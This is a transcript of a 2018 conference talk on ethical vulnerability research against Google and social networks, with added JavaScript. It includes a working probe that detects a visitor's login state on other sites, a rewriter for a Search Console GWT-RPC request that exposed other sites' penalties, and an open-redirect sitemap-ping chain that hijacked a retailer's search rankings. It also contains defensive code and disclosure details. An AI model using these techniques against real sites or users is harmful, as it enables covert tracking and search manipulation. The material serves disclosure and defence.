
SearchLove Boston 2018 - Tom Anthony - Hacking Google: what you can learn from ethical vulnerability research

Tom has long been fascinated with how the web works… and how he could break it. In this presentation, Tom will discuss some of the times that he has discovered security issues in Google, Facebook and Twitter. He will discuss compromising Search Console so that he could look up any penalty in the Manual Action tool, how he took control of tens of thousands of websites, and how he recently discovered a major bug that let him rank brand new sites on the first page with no links at all. Tom will outline how these exploits work, and in doing so share some details about the technical side of the web.


  1. HACKING GOOGLE: Learning from Ethical Vulnerability Research. @TomAnthonySEO
  2. 20 years ago…
  3. I’d hacked into a corporate network…
  4. 287 Years
  5. Bug Bounty programs didn’t exist yet…
  6. Turns out, SEO required the same mindset…
  7. Social Network Login Status • Googlebot Experiments • Google Manual Actions • XML Sitemaps Manipulation
  8. Turns out you can combine SEO + Vulnerability Research… • 1st page of results • 6 days old domain • 0 links
  9. Allowing for SEO results like this, from one day to the next…
  10. Social Network Login Status
  11. DETECT WHICH SOCIAL NETWORKS PEOPLE ARE LOGGED INTO http://www.tomanthony.co.uk/tools/detect-social-network-logins/
  12. facebook.com/tomsprofile
  13. Request facebook.com/tomsprofile. Logged out: 302 redirect to facebook.com/login?continue=/tomsprofile. Logged in: page served (200).
  14. Request facebook.com/login?continue=/tomsprofile. Logged out: login page served (200). Logged in: 302 redirect to facebook.com/tomsprofile.
  15. Request facebook.com/login?continue=/tomsprofile. Already logged in, so it just redirects to the intended page.
  16. Request facebook.com/login?continue=/logo.png. Logged out: login page served (200). Logged in: 302 redirect to facebook.com/logo.png.
  17. Request facebook.com/login?continue=/logo.png. Already logged in, so it redirects and serves the image.
  18. facebook.com/login?continue=/logo.png → Image (logged in) or Webpage (anonymous)
  19. <img src="https://facebook.com/login?continue=/logo.png" onload="alert('loggedin')" onerror="alert('anonymous')">
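The probe on slides 12-19, written out as a reusable browser function. This is an added example, not the talk's code or tool: the two probe URLs are hypothetical placeholders (the real instance on the slides was facebook.com/login?continue=/logo.png), and any endpoint that 302s an already-authenticated user to an image while serving HTML to everyone else behaves the same way.

```javascript
// Added example, not from the talk. Probe endpoints are hypothetical placeholders.
const PROBES = [
  { network: 'social-a', url: 'https://social-a.example/login?continue=/logo.png' },
  { network: 'social-b', url: 'https://social-b.example/login?next=/favicon.ico' },
];

// Browser loader: <img> fires onload only if the final response decodes as an image,
// and onerror if it is the HTML login page. The browser attaches the probed site's
// cookies to the request, which is what leaks the login state.
function loadAsImage(url) {
  return new Promise((resolve, reject) => {
    const img = new Image();
    img.onload = () => resolve(true);
    img.onerror = () => reject(new Error('not an image: ' + url));
    img.src = url;
  });
}

// loggedin  -> the site redirected to the image, so the browser holds a session there
// anonymous -> the site answered with its login page instead
async function probeLoginState(probe, loader = loadAsImage) {
  try {
    await loader(probe.url);
    return 'loggedin';
  } catch {
    return 'anonymous';
  }
}

// Run every probe in parallel; the loader is injectable so the logic can be exercised
// outside a browser with a fake loader.
async function detectLogins(probes = PROBES, loader = loadAsImage) {
  const results = {};
  await Promise.all(probes.map(async (p) => {
    results[p.network] = await probeLoginState(p, loader);
  }));
  return results;
}

// Slide 21's "pump it into GA": one sorted, comma-separated string of the networks the
// visitor is logged into is enough for a custom dimension.
function summarise(results) {
  return Object.entries(results)
    .filter(([, state]) => state === 'loggedin')
    .map(([network]) => network)
    .sort()
    .join(',');
}
```

Two caveats worth knowing before relying on this. The request only carries cookies if the probed site's session cookie is sent cross-site, and browsers that default to `SameSite=Lax` (Chrome has since 2020) strip cookies from cross-site `<img>` loads, so the probe reports "anonymous" unless the site explicitly sets `SameSite=None; Secure`. And the fix on the site's side is not to redirect an already-authenticated user to an arbitrary `continue` target without first checking the target is a page, which is the same open-redirect hygiene the later sitemap section comes back to.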
  20. OTHERS HAVE EXTENDED IT https://robinlinus.github.io/socialmedia-leak/
  21. PUMP IT INTO GA
  22. CUSTOMISE SOCIAL BUTTONS
  23. LOGGED IN TO A COMPETITOR?
  24. TAKEAWAY: Social Network preferences can be recorded*/used. (* something something GDPR)
  25. OBSERVATION: Redirects can be abused to get unexpected behaviours
  26. Googlebot Experiments
  27. GOOGLEBOT & COOKIES
  28. GOOGLEBOT & COOKIES
  29. GOOGLEBOT JAVASCRIPT: RANDOM IS NOT RANDOM! Math.random() = 0.19426893815398216
  30. SCRIPTS THAT SHOULD BE RANDOM CAN DETECT GOOGLEBOT
  31. GOOGLEBOT JAVASCRIPT: SECONDS ARE NOT SECONDS. setTimeout(doSomething, 5000): browsers will wait 5000 milliseconds (5 seconds); Googlebot fast-forwards (dates become wrong).
  32. TAKEAWAY: Googlebot does accept cookies in certain scenarios.
  33. TAKEAWAY: Googlebot uses heavily optimised JavaScript.
  34. OBSERVATION: There are undocumented functionalities in Googlebot
  35. Google Manual Actions
  36. The Snag
  37. MANUAL ACTIONS TOOL
  38. API ENDPOINT https://www.google.com/webmasters/tools/gwt/MANUAL_ACTION_PUBLIC?hl=en&siteUrl=http://www.tomanthony.co.uk/
  39. POST DATA (a GWT-RPC request body; the siteUrl is the only reference to a property in it): 7|0|13|https://www.google.com/webmasters/tools/gwt/|DE16AEA7C924CC47F26F7ADC4C584289|com.google.crawl.wmconsole.fe.feature.gwt.manualaction.shared.ManualActionService|getManualActions|com.google.crawl.wmconsole.fe.feature.gwt.base.shared.FeatureContext/1637625730|java.lang.String/2004016611|/webmasters/tools|java.lang.Boolean/476441737|com.google.crawl.wmconsole.fe.feature.gwt.config.FeatureKey/4151209095|0|en|http://www.tomanthony.co.uk/|com.google.crawl.wmconsole.fe.base.PermissionLevel/2603202488|1|2|3|4|2|5|6|5|7|8|0|0|9|5|10|11|12|12|13|5|12|
  40. RESPONSE (NO PENALTY)
  41. ELITE HACKING SKILLZ (the same request with the siteUrl string swapped for a site I do not own): 7|0|13|https://www.google.com/webmasters/tools/gwt/|DE16AEA7C924CC47F26F7ADC4C584289|com.google.crawl.wmconsole.fe.feature.gwt.manualaction.shared.ManualActionService|getManualActions|com.google.crawl.wmconsole.fe.feature.gwt.base.shared.FeatureContext/1637625730|java.lang.String/2004016611|/webmasters/tools|java.lang.Boolean/476441737|com.google.crawl.wmconsole.fe.feature.gwt.config.FeatureKey/4151209095|0|en|http://www.apple.com/|com.google.crawl.wmconsole.fe.base.PermissionLevel/2603202488|1|2|3|4|2|5|6|5|7|8|0|0|9|5|10|11|12|12|13|5|12|
  42. GOOGLE HAPPY TO SHARE
  43. POSSIBLE TO SIMPLY CRAWL A LIST OF MANUAL ACTIONS
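The request on slides 39 and 41 is a GWT-RPC body, and the edit that exposed other sites' penalties was a change to a single string-table entry. The following is an added example, not code from the talk: it parses the slide's own payload into the GWT-RPC layout (version, flags, string-table size, the strings, then an integer stream whose values are 1-based references into the string table), serialises it back, and performs the slide 41 substitution. The payload constant is copied from the slide; the function names and the round-trip helper are this example's, and the escape handling covers only the two escapes GWT's client serialiser uses for the pipe separator and the backslash.

```javascript
// Added example, not from the talk. SAMPLE_REQUEST is the slide 39 body, rebuilt from its fields.
const SAMPLE_REQUEST = [
  '7', '0', '13',
  'https://www.google.com/webmasters/tools/gwt/',
  'DE16AEA7C924CC47F26F7ADC4C584289',
  'com.google.crawl.wmconsole.fe.feature.gwt.manualaction.shared.ManualActionService',
  'getManualActions',
  'com.google.crawl.wmconsole.fe.feature.gwt.base.shared.FeatureContext/1637625730',
  'java.lang.String/2004016611',
  '/webmasters/tools',
  'java.lang.Boolean/476441737',
  'com.google.crawl.wmconsole.fe.feature.gwt.config.FeatureKey/4151209095',
  '0', 'en',
  'http://www.tomanthony.co.uk/',
  'com.google.crawl.wmconsole.fe.base.PermissionLevel/2603202488',
  '1', '2', '3', '4', '2', '5', '6', '5', '7', '8', '0', '0', '9', '5', '10', '11', '12', '12', '13', '5', '12',
].join('|') + '|';

// Split on the '|' separator, honouring GWT's escapes: "\!" is a literal pipe, "\\" a backslash.
function tokenize(payload) {
  const tokens = [];
  let cur = '';
  for (let i = 0; i < payload.length; i++) {
    const ch = payload[i];
    if (ch === '\\') {
      const next = payload[++i] ?? '';
      cur += next === '!' ? '|' : next;
    } else if (ch === '|') {
      tokens.push(cur);
      cur = '';
    } else {
      cur += ch;
    }
  }
  if (cur !== '') tokens.push(cur);
  return tokens;
}

// Layout: version | flags | string-table size | strings... | integer stream.
// Stream values are 1-based indexes into the string table (0 means null). The first
// entries name the module base, permutation strong name, service, method and parameter
// types; the remainder is the serialised parameter values.
function parseGwtRpc(payload) {
  const t = tokenize(payload);
  const count = Number(t[2]);
  const strings = t.slice(3, 3 + count);
  const stream = t.slice(3 + count).map(Number);
  const ref = (i) => (i === 0 ? null : strings[i - 1]);
  const paramCount = stream[4];
  return {
    version: Number(t[0]), flags: Number(t[1]), strings, stream,
    moduleBase: ref(stream[0]), strongName: ref(stream[1]),
    service: ref(stream[2]), method: ref(stream[3]),
    paramTypes: stream.slice(5, 5 + paramCount).map(ref),
  };
}

function escapeGwt(s) {
  return s.replace(/\\/g, '\\\\').replace(/\|/g, '\\!');
}

function serializeGwtRpc(req) {
  return [req.version, req.flags, req.strings.length, ...req.strings.map(escapeGwt), ...req.stream]
    .join('|') + '|';
}

// The slide 41 edit: the only thing binding the request to a property is the siteUrl
// string, so replacing that one table entry asks the server about a different site.
// The stream is untouched because it references strings by position, not by value.
function rewriteString(payload, from, to) {
  const req = parseGwtRpc(payload);
  const idx = req.strings.indexOf(from);
  if (idx === -1) throw new Error('string not in table: ' + from);
  req.strings[idx] = to;
  return serializeGwtRpc(req);
}
```

Note that the siteUrl index (12) appears twice in the stream: once as the `java.lang.String` parameter and once inside the `FeatureContext`, so a naive text replace and a table edit happen to agree here, but the table edit is the one that stays correct when a value contains a pipe. The server-side lesson is the one slide 42 illustrates: authorisation has to be derived from the caller's verified properties, never from a property name the caller supplies in the request body.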
  44. SOME SITES HAD MORE PROBLEMS THAN OTHERS…
  45. At this point, I’d confirmed there was a definite security issue, and reported it to Google.
  46. OMINOUS MATT CUTTS EMAILS… :D (* Matt was actually great)
  47. GOOGLE RESPONSE ✓ Acknowledged report in only 11 minutes! ✓ Triaged in a couple of hours. ✓ Fixed and back online in 4 days. ✓ $5000 bounty.
  48. TAKEAWAY: A lot more sites have manual penalties than you may think!
  49. OBSERVATION: Google Search Console also has security gaps
  50. So far I have not shown any direct manipulation of rankings…
  51. Disclaimer: Distilled don’t condone blackhat. Blackhat is naughty & bad.
  52. XML Sitemaps Manipulation
  53. OBSERVATION: Redirects can be abused to get unexpected behaviours
  54. OBSERVATION: There are undocumented functionalities in Googlebot
  55. OBSERVATION: Google Search Console also has security gaps
  56. Can we put all that together?
  57. SUBMITTING AN XML SITEMAP ✓ Search Console ✓ robots.txt
  58. SUBMITTING AN XML SITEMAP
  59. SUBMITTING AN XML SITEMAP: Not entirely true…
  60. CAN SUBMIT NEW SITEMAP FILES VIA THE PING URL ✓ Typically crawled within seconds ✓ No auth: ping sitemaps for any domain ✓ Google follows redirects
  61. CAN SUBMIT NEW SITEMAP FILES VIA THE PING URL ✓ Typically crawled within seconds ✓ No auth: ping sitemaps for any domain ✓ Google follows redirects. Interesting…
  62. GOOGLE’S CHECKLIST FOR A VALID XML SITEMAP ✓ Sitemap must be correctly formatted ✓ The URLs must exist ✓ Site containing the URLs must be in GSC ✓ Site hosting the sitemap must be in GSC
  63. GOOGLE’S CHECKLIST FOR A VALID XML SITEMAP ✓ Sitemap must be correctly formatted ✓ The URLs must exist ✓ Site containing the URLs must be in GSC ✓ Site hosting the sitemap must be in GSC. Interesting…
  64. GOOGLE’S CHECKLIST FOR A VALID XML SITEMAP ✓ Site hosting the sitemap must be in GSC
  65. OBSERVATIONS ✓ Google follows redirects ✓ Site hosting sitemap must be in GSC
  66. OBSERVATIONS ✓ Google follows redirects ✓ Site hosting sitemap must be in GSC. QUESTIONS ✓ Will Google follow a cross-domain sitemap redirect? ✓ Will they ‘trust’ it?
  67. QUESTION: Will Google follow a cross-domain redirect for a sitemap?
  68. SIMPLE TEST 1. Hosted a sitemap.xml on blue.com 2. Set up a redirect script on green.com 3. Ping green.com?next=blue.com/sitemap.xml https://www.google.com/webmasters/sitemaps/ping?sitemap=http://green.com/next/blue.com/sitemap.xml
  69. Will Google follow a cross-domain redirect for a sitemap? YES
  70. QUESTION: Will they ‘trust’ it? (if submitted via the ping URL)
  71. Will they ‘trust’ it? Let’s assume…
  72. QUESTION: How could we EXPLOIT it?
  73. JONO IS OUR INNOCENT VICTIM jono.com
  74. REDIRECT URLS STRIKE BACK! jono.com/logout?continue=/page.html
  75. VICTIM & ATTACKER jono.com tom.com
  76. OPEN REDIRECTS (CROSS DOMAIN) jono.com/logout?continue=tom.com/page.html
  77. WHAT HAPPENS IF WE DO THIS? jono.com/logout?continue=tom.com/evil.xml
  78. WHAT HAPPENS IF WE DO THIS? jono.com/logout?continue=tom.com/evil.xml. URL on jono.com, but serves an XML Sitemap from tom.com.
  79. WHAT HAPPENS IF WE DO THIS??? https://www.google.com/webmasters/sitemaps/ping?sitemap=http://jono.com/logout?continue=tom.com/evil.xml
  80. WHAT HAPPENS IF WE DO THIS??? https://www.google.com/webmasters/sitemaps/ping?sitemap=http://jono.com/logout?continue=tom.com/evil.xml. Ping the URL to submit the sitemap. Will Google think the evil sitemap belongs to jono.com?
  81. PINGING SITEMAPS CROSS-DOMAIN ✓ Google follows the redirect, and crawls it. ✓ Google trusts it as canonical to the originating domain. https://www.google.com/webmasters/sitemaps/ping?sitemap=http://jono.com/logout?continue=tom.com/evil.xml
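The chain on slides 74-81 has three parts: an open redirect on the victim, a ping URL that wraps it, and a consumer that attributes the redirected file to the wrong host. The following is an added example, not the talk's code: it shows the `/logout?continue=` endpoint in its vulnerable form and a hardened form, builds the ping URL from slide 79 with proper encoding, and walks the redirect chain the way a sitemap consumer should before deciding which host to trust. jono.com (victim) and tom.com (attacker) are the slides' placeholder hosts; the function names and the in-memory request routing are this example's.

```javascript
// Added example, not from the talk. Hosts jono.com / tom.com are the slides' placeholders.

// Vulnerable: the "continue" value is echoed straight into the Location header, so the
// endpoint redirects to any URL the query string names (slide 76).
function vulnerableLogoutRedirect(requestUrl) {
  const u = new URL(requestUrl);
  return { status: 302, location: u.searchParams.get('continue') || '/' };
}

// Hardened: resolve the value against our own origin and refuse anything that lands
// elsewhere. Comparing parsed origins rather than string prefixes also catches
// protocol-relative "//tom.com/..." and the "/\tom.com/..." form browsers normalise.
function hardenedLogoutRedirect(requestUrl) {
  const u = new URL(requestUrl);
  const home = u.origin + '/';
  const raw = u.searchParams.get('continue');
  if (!raw) return { status: 302, location: home };
  let target;
  try {
    target = new URL(raw, u.origin);
  } catch {
    return { status: 302, location: home };
  }
  if (target.origin !== u.origin) return { status: 302, location: home };
  return { status: 302, location: target.href };
}

// Attacker side (slide 79): the sitemap parameter is the victim's redirect URL. It has to be
// percent-encoded so its own "?continue=" survives inside the ping URL's query string.
function buildSitemapPing(victimRedirectUrl) {
  const ping = new URL('https://www.google.com/webmasters/sitemaps/ping');
  ping.searchParams.set('sitemap', victimRedirectUrl);
  return ping.href;
}

// Consumer side: follow the chain as a crawler would. Only jono.com's /logout is served by
// the supplied handler; every other URL answers 200 (stands in for tom.com serving evil.xml).
// The slide 81 bug was attributing the file to submittedHost; the safe rule is servedHost.
function resolveSitemapSubmission(submittedUrl, logoutHandler, maxHops = 5) {
  let current = submittedUrl;
  for (let hop = 0; hop < maxHops; hop++) {
    const u = new URL(current);
    const resp = (u.host === 'jono.com' && u.pathname === '/logout')
      ? logoutHandler(current)
      : { status: 200 };
    if (resp.status !== 302) break;
    current = new URL(resp.location, current).href;
  }
  const submittedHost = new URL(submittedUrl).host;
  const servedHost = new URL(current).host;
  return {
    submittedHost,
    servedHost,
    finalUrl: current,
    trustForSubmittedHost: submittedHost === servedHost,
  };
}
```

With the vulnerable handler the chain ends on tom.com and `trustForSubmittedHost` is false, which is the decision the crawler should have reached; with the hardened handler the attacker's ping only ever fetches jono.com's own home page. If the endpoint cannot be fixed, slide 111's fallback of disallowing its path in robots.txt keeps a well-behaved crawler from following it at all, though it does nothing for the browser-side abuses earlier in the talk.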
  82. WE CAN NOW SUBMIT TRUSTED SITEMAPS FOR OTHER SITES
  83. We can now submit hreflang entries for other sites…
  84. Let’s try it in the wild…
  85. DISCLAIMER: I’m showing real results, but an alternative (similarly sized) UK retailer in the screenshots.
  86. EXPERIMENT: HIJACK TESCO.COM INTERNATIONAL EQUITY
  87. UK PRESENCE, BUT NO US PRESENCE
  88. HIJACK UK EQUITY TO RANK IN US
  89. HIJACK UK EQUITY TO RANK IN US
  90. STEP 1: FIND A REDIRECT
  91. STEP 1: FIND A REDIRECT
  92. STEP 2: REGISTER A DOMAIN ($12) TESCOGLOBAL.COM
  93. STEP 3: SET UP A NEW SITE ✓ Scrape contents for products/categories ✓ Mirror the URL structure
  94. STEP 4: CREATE AN EVIL SITEMAP
  95. STEP 5: PING OUR EVIL SITEMAP (HOSTED ON OUR FAKE SITE) https://www.google.com/webmasters/sitemaps/ping?sitemap=http://www.tesco.com/logout?continue=http://tescoglobal.com/sitemap_global.xml
  96. RESULTS: CRAWL ACTIVITY APPEARS IN SEARCH CONSOLE
  97. RESULTS: SEARCH VISIBILITY GROWS RAPIDLY
  98. RESULTS: TRAFFIC APPEARING IN GA
  99. RESULTS: BRITISH TERMS RANKING 1ST FOR MANY QUERIES
  100. Still only submitted a sitemap, nothing else.
  101. RESULTS: TRAFFIC KEEPS ON INCREASING…
  102. RESULTS: SEARCH VISIBILITY GROWS MORE
  103. RESULTS: I HIT THE FIRST PAGE FOR COMPETITIVE MONEY TERMS… • 1st page of results • 6 days old domain • 0 links
  104. RESULTS: MILLIONS OF SEARCH IMPRESSIONS
  105. ‘LINKS’ APPEAR IN GSC, SHOWING GOOGLE TRUSTS THE SITEMAP
  106. EARLIER: CAN’T SUBMIT SITEMAPS IN GSC WHEN NOT PERMITTED. Example: "Sitemap not permitted".
  107. NOW: CROSS-SUBMITTED THE SITEMAP TO MY GSC, AND IT WAS ALLOWED. A sitemap for tesco.com URLs was allowed in the tescoglobal.com GSC.
  108. EVEN TRACKS INDEXATION… (the tesco.com sitemap, in the tescoglobal.com GSC)
  109. SUMMARY ✓ Budget: $12 ✓ Setup time: ~4 hours ✓ Other activity: nothing ✓ Links: 0 ✓ Impressions: > 1.5 million ✓ Clicks: > 12,000
  110. ALMOST UNDETECTABLE
  111. DEFENCE ✓ No open redirects ✓ If you have them, block them in robots.txt ✓ Have a sitemap, with hreflang & media entries ✓ Hide your sitemaps ✓ Check 302s in logs
  112. FINDING OPEN REDIRECTS ✓ Look for redirect parameters (e.g. continue= or next=) ✓ Check login & logout URLs ✓ Site searches, e.g. site:www.foo.com inurl:=http ✓ Better with specific sections: site:www.foo.com/bar inurl:=http ✓ Check they are not blocked in robots.txt ✓ Check openbugbounty.org
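Slides 111 and 112 say to check your logs for 302s and to look for redirect parameters; the takeaway on slide 116 repeats the log check. The following is an added example, not the talk's code, that does both over access-log lines in the common combined format: it keeps redirect responses whose request URL carries a redirect-style parameter resolving to another host, and flags whether the client claimed to be Googlebot, since the crawler has to be the one following the redirect for the sitemap trick to work. The log lines are constructed for the example, jono.com/tom.com are the slides' placeholder hosts, and the parameter-name list is this example's guess at common names, not an exhaustive one.

```javascript
// Added example, not from the talk. Log lines are constructed; hosts are the slides' placeholders.
const OWN_HOST = 'jono.com';
const REDIRECT_PARAMS = ['continue', 'next', 'url', 'redirect', 'return', 'goto', 'dest'];
const REDIRECT_STATUSES = [301, 302, 303, 307, 308];

const SAMPLE_LOG = [
  '66.249.66.1 - - [12/Sep/2017:10:15:01 +0000] "GET /logout?continue=http://tom.com/evil.xml HTTP/1.1" 302 0 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"',
  '203.0.113.7 - - [12/Sep/2017:10:15:02 +0000] "GET /logout?continue=/account HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
  '203.0.113.8 - - [12/Sep/2017:10:15:03 +0000] "GET /login?next=//tom.com/x HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
  '203.0.113.9 - - [12/Sep/2017:10:15:04 +0000] "GET /sitemap.xml HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
  '203.0.113.10 - - [12/Sep/2017:10:15:05 +0000] "GET /out?url=http://tom.com/ HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
];

// Combined log format: ip ident user [time] "METHOD path PROTO" status bytes "referer" "ua"
const LINE_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"$/;

function parseLine(line) {
  const m = LINE_RE.exec(line);
  if (!m) return null;
  return { ip: m[1], time: m[2], method: m[3], path: m[4], status: Number(m[5]), ua: m[6] };
}

// Returns the off-host target a redirect parameter on this request would send the client
// to, or null. Resolving against our own origin means "//tom.com/x" is judged by its real
// host rather than by whether the string starts with "http".
function offHostTarget(path, ownHost = OWN_HOST) {
  const url = new URL(path, 'https://' + ownHost);
  for (const name of REDIRECT_PARAMS) {
    const value = url.searchParams.get(name);
    if (!value) continue;
    let target;
    try {
      target = new URL(value, url.origin);
    } catch {
      continue;
    }
    if (target.host !== ownHost) return { param: name, target: target.href };
  }
  return null;
}

// A hit is a redirect response to a request that names another host in a redirect
// parameter. The user agent is only a hint: verify a Googlebot claim by reverse DNS on the
// IP (googlebot.com / google.com) before acting on it, since the string is trivially spoofed.
function findOpenRedirects(lines, ownHost = OWN_HOST) {
  const hits = [];
  for (const line of lines) {
    const entry = parseLine(line);
    if (!entry || !REDIRECT_STATUSES.includes(entry.status)) continue;
    const off = offHostTarget(entry.path, ownHost);
    if (!off) continue;
    hits.push({ ...entry, ...off, googlebot: /Googlebot/i.test(entry.ua) });
  }
  return hits;
}
```

Run over the sample, this reports the Googlebot fetch of `/logout?continue=http://tom.com/evil.xml` and the protocol-relative `/login?next=//tom.com/x`, and ignores the same-host `continue=/account` and the two 200 responses. The `/out?url=` line answering 200 is a reminder that the scan only sees what the status code says: if your server logs the `Location` response header (Apache's `%{Location}o` in a `LogFormat`), match on that instead of inferring the target from the request parameter.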
  113. GOOGLE OFFICIAL RESPONSE ✓ I reported it in September 2017 ✓ March 2018: Google awarded a bug bounty ✓ March 2018: Google confirmed it is fixed ✓ April 2018: Google increased the bug bounty ($5000)
  114. TAKEAWAY: hreflang entries are ignored if your sitemaps are unverified
  115. TAKEAWAY: Ensure you do not have open redirects on your site! (block them in robots.txt if you can’t remove them)
  116. TAKEAWAY: Not seen this attack in the wild. Check your logs for 302s.
  117. TAKEAWAY: Be aware, there are these types of potential attacks out there (but don’t blame everything on them!)
  118. TAKEAWAY: Bring back the Hacker Mindset
  119. Thank you! @TomAnthonySEO